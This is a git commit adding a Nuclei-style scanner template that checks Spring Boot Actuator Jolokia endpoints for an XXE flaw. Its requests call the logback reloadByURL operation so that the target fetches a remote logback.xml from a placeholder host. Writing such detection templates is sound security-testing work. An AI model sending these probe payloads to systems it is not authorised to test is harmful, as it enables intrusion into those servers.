🔥 Add Springboot Actuators (Jolokia) XXE Vulnerability

patch-1
dw1 2020-07-02 23:15:33 +07:00
parent c167a31784
commit ecd295aff4
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: springboot-actuators-jolokia-xxe
info:
name: Spring Boot Actuators (Jolokia) XXE
author: dwisiswant0
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
- "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "http:\\/\\/nonexistent:31337\\/logback.xml"
- "reloadByURL"
- "JoranException"
condition: and
part: body
- type: word
words:
- "X-Application-Context"
part: header